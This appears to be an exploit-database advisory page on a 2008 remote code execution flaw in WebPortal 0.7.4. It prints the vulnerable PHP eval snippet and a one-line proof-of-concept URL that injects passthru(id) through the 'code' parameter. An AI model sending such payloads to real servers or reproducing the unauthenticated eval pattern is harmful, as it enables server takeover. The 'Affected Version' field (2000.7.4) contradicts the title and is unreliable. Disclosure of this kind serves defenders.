header-logo
Suggest Exploit
vendor:
WebPortal
by:
milw0rm.com
9.8
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: WebPortal
Affected Version From: 2000.7.4
Affected Version To: 2000.7.4
Patch Exists: YES
Related CWE: N/A
CPE: a:ivanoculmine:webportal
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

WebPortal <= 0.7.4 (code) Remote Code Execution Vulnerability

WebPortal version 0.7.4 and below is vulnerable to Remote Code Execution. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server with malicious code in the 'code' parameter of the 'index.php?m=admin&f=console&action=execute' URL. This malicious code will be executed on the vulnerable server.

Mitigation:

Upgrade to the latest version of WebPortal.
Source

Exploit-DB raw data:

WebPortal <= 0.7.4 (code) Remote Code Execution Vulnerability
Download : http://webportal.ivanoculmine.com/download.php?mid=14
Vuln :
######################################################################
        <?
        if ($_GET["action"] == "execute") {
          eval (stripslashes($_POST["code"]));
        }
        ?>
######################################################################
POC :
/index.php?m=admin&f=console&action=execute&code=(id);} passthru(id);
######################################################################

# milw0rm.com [2008-09-23]

Navigation

Suggest Exploit

Services By CQR